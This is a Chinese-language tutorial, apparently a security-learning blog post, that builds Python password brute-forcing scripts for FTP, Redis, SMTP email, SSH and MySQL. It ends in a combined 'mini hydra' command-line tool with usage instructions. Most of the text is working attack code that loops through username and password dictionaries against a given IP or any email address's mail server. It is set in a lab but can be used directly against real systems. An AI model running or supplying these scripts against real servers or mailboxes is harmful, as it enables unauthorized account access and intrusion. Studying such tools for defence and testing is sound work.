目录
[案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议](#案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议)
[案例二: Python-数据库爆破-redis 库操作redis 协议](#案例二: Python-数据库爆破-redis 库操作redis 协议)
[案例三:Python-邮件爆破-smtplib 库操作 smtp 协议](#案例三:Python-邮件爆破-smtplib 库操作 smtp 协议)
案例四:Python-登录爆破-paramiko库操作ssh协议
[案例五: Python-数据库爆破-pymysql 库操作 mysql 协议](#案例五: Python-数据库爆破-pymysql 库操作 mysql 协议)
[案例六: python-爆破整合-小型hydra](#案例六: python-爆破整合-小型hydra)
案例一: Python-文件传输爆破-ftplib 库操作 ftp 协议
开一个ftp
利用ftp正确登录与失败登录都会有不同的回显
使用ftplib库进行测试
python
from ftplib import FTP
# FTP服务器地址
ftp_server = '192.168.172.132'
# FTP服务器端口(默认为21)
ftp_port = 21
# FTP登录用户名
ftp_user = 'root'
# FTP登录密码
ftp_pass = '123.comm'
ftp = FTP()
ftp.connect(ftp_server,ftp_port)
ftp.login(ftp_user,ftp_pass)
成功
失败
在此基础之上加上字典进行循环就能爆破出来密码
爆破ftp账号密码的程序
python
from ftplib import FTP
def ftp_check(ip,port,username,password):
ftp = FTP()
ftp.connect(ip,port)
try:
ftp.login(username,password)
print(username+"|"+password+"-->success")
exit()
except Exception as e:
print(username+"|"+password+"-->failed")
if __name__ == '__main__':
ip = input("please input ip:")
port = int(input("please input port:"))
with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
ftp_check(ip,port,name,password)
运行结果
如果觉得输出太过繁琐,可以不输出失败的结果
案例二: Python-数据库爆破-redis 库操作redis 协议
开启redis:端口为6379
配置密码
尝试连接,redis没有账号这一说法,都是用密码连接就ok
连接成功之后可以设置变量,可以利用这一点如果没有连接的话会报错
因为普通连接就算连接不成功他也不会报错
爆破程序
python
import redis
def redis_check(ip,password):
try:
conn=redis.Redis(host=ip, port=6379, password=password, db=0)
conn.set("test","123")
print(password+"-->success")
conn.delete("test")
exit()
except Exception as e:
print(password+"-->failed")
if __name__ == "__main__":
ip = input("please input ip:")
with open(".\\conf\\dic_password_redis.txt","r") as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
redis_check(ip,password)
运行结果
案例三:Python-邮件爆破-smtplib 库操作 smtp 协议
smtp调用库smtplib,smtp邮件可以利用授权码代替密码进行登录
需要根据后缀来进行判断是什么邮箱
代码,登录失败会报错
python
import smtplib
def email_check(email,password):
smtp_split = email.split("@")[1]
smtp_server = 'smtp.'+smtp_split
#print(smtp_server)
smtp_port = 25
try:
smtp_conn = smtplib.SMTP()
smtp_conn.connect(smtp_server, 25) # 25 为 SMTP 端口号
smtp_conn.login(email, password)
print("password is "+password+' --> ok')
exit()
except Exception as e:
pass
#print("error")
if __name__ == "__main__":
email = input("please input your eamil:")
with open(".\\conf\\dic_password_email.txt","r") as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
email_check(email,password)
运行结果
案例四:Python-登录爆破-paramiko库操作ssh协议
ssh连接调用paramiko库
python
import paramiko
# 创建SSH客户端
client = paramiko.SSHClient()
# 自动添加主机名和密钥到本地的known_hosts文件
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# 连接到远程主机
client.connect('远程主机IP',"port" username='用户名', password='密码')
连接成功不会报错
失败报错
代码,端口为连接的第二个参数,默认为22
python
import paramiko,time
def ssh_check(ip,username,password):
print(username + " | "+password +"")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(ip,username=username, password=password)
print(username + " | "+password +"--> success")
exit()
except Exception as e:
pass
time.sleep(1)
if __name__ == '__main__':
ip = input("please input ip:")
with open('.\\conf\\dic_username_ssh.txt', 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
with open('.\\conf\\dic_password_ssh.txt', 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
ssh_check(ip,name,password)
运行结果
案例五: Python-数据库爆破-pymysql 库操作 mysql 协议
创建一个允许远程登陆的用户jie 123.com
CREATE USER 'jie'@'%' IDENTIFIED BY '123.com';
GRANT ALL PRIVILEGES ON *.* TO 'jie'@'%';
FLUSH PRIVILEGES;
能够成功连接
建立mysql连接
python
import mysql.connector
# pip install mysql-connector-python 安装这个库
# 创建数据库连接
db = mysql.connector.connect(
host="192.168.172.132", # MySQL服务器地址
port=3306,
user="jie", # 用户名
password="123.comm", # 密码
database="mysql" # 数据库名称
)
安装相关库
错误连接会报错
在此基础之上写爆破mysql
python
import mysql.connector
def mysql_check(ip,port,username,password):
try:
db = mysql.connector.connect(
host=ip, # MySQL服务器地址
port=port,
user=username, # 用户名
password=password, # 密码
database="mysql" # 数据库名称
)
print(username + " | " +password + "--> success")
exit()
except Exception as e:
pass
if __name__ == '__main__':
ip = input("please input ip:")
port = int(input("please input port:"))
with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
mysql_check(ip,port,name,password)
运行结果
案例六: python-爆破整合-小型hydra
如果再命令行以 python xx.py 123456这种后面带参数的方式输入需要引入sys库,利用sys.argv[1]
可以把变量设置在文件后面,如下图所示
代码,大部分功能已经实现,就是自定义字典的时候,不足5个参数的时候,必须有数字占位,否则,不能自动判断,多少参数,不然会报错
python
from ftplib import FTP
import paramiko,time
import mysql.connector
import smtplib
import redis
import sys
def ftp_check(ip,port,username,password):
ftp = FTP()
ftp.connect(ip,port)
try:
ftp.login(username,password)
print(username+"|"+password+"-->success")
exit()
except Exception as e:
pass
#print(username+"|"+password+"-->failed")
def ssh_check(ip,username,password):
print(username + " | "+password +"")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(ip,username=username, password=password)
print(username + " | "+password +"--> success")
exit()
except Exception as e:
pass
time.sleep(1)
def mysql_check(ip,port,username,password):
try:
db = mysql.connector.connect(
host=ip, # MySQL服务器地址
port=port,
user=username, # 用户名
password=password, # 密码
database="mysql" # 数据库名称
)
print(username + " | " +password + "--> success")
exit()
except Exception as e:
pass
def email_check(email,password):
smtp_split = email.split("@")[1]
smtp_server = 'smtp.'+smtp_split
smtp_port = 25
try:
smtp_conn = smtplib.SMTP()
smtp_conn.connect(smtp_server, 25) # 25 为 SMTP 端口号
smtp_conn.login(email, password)
print("password is "+password+' --> ok')
exit()
except Exception as e:
pass
#print("error")
def redis_check(ip,password):
try:
conn=redis.Redis(host=ip, port=6379, password=password, db=0)
conn.set("test","123")
print(password+"-->success")
conn.delete("test")
exit()
except Exception as e:
pass
if __name__ == "__main__":
if len(sys.argv) <= 2:
print('eg:固定字典使用说明:')
print('python hydra.py ftp ip port')
print('python hydra.py ssh ip')
print('python hydra.py redis ip')
print('python hydra.py mysql ip port')
print('python hydra.py email xxxx@qq.com')
print('eg:自定义字典使用说明:')
print('python hydra.py ftp ip port user.txt pass.txt')
print('python hydra.py ssh ip port user.txt pass.txt')
print('python hydra.py redis ip 1 2 pass.txt')
print('python hydra.py mysql ip port user.txt pass.txt')
print('python hydra.py email xx@qq.com 2 3 pass.txt')
if len(sys.argv) > 2:
xy=sys.argv[1]
ip=sys.argv[2]
if len(sys.argv) > 3:
port = sys.argv[3]
port = int(port)
if len(sys.argv) >= 5:
usertxt=sys.argv[4]
passtxt=sys.argv[5]
try:
if usertxt is not None:
if xy=="ftp" :
with open(usertxt, 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
print(name)
with open(passtxt, 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
ftp_check(ip,port,name,password)
elif xy=="ssh":
with open(usertxt, 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
with open(passtxt, 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
ssh_check(ip,name,password)
elif xy=="redis":
with open(passtxt,"r") as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
redis_check(ip,password)
elif xy=="mysql":
with open(usertxt, 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
print(name)
with open(passtxt, 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
mysql_check(ip,port,name,password)
elif xy=="email":
email = ip
print(email)
with open(passtxt,"r") as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
email_check(email,password)
except Exception as e:
try:
if xy=="ftp" :
with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
ftp_check(ip,port,name,password)
elif xy=="ssh":
with open('.\\conf\\dic_username_ssh.txt', 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
with open('.\\conf\\dic_password_ssh.txt', 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
ssh_check(ip,name,password)
elif xy=="redis":
with open(".\\conf\\dic_password_redis.txt","r") as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
redis_check(ip,password)
elif xy=="mysql":
with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
names = file.readlines()
for name in names:
name = name.replace("\n","")
with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
mysql_check(ip,3306,name,password)
elif xy=="email":
email = ip
print(email)
with open(".\\conf\\dic_password_email.txt","r") as file:
passwords = file.readlines()
for password in passwords:
password = password.replace("\n","")
email_check(email,password)
except Exception as e:
pass
运行结果
不输入参数进行提示
无自定义字典ftp爆破
无自定义字典ssh爆破
无自定义字典redis爆破
无自定义字典mysql爆破
无自定义字典邮箱爆破
自定义字典ftp爆破
自定义字典ssh爆破,这里我设置默认为22端口,用1做数字接收占位,无实质作用,可修改为更改端口
自定义字典爆破redis
自定义字典mysql爆破
自定义字典邮箱爆破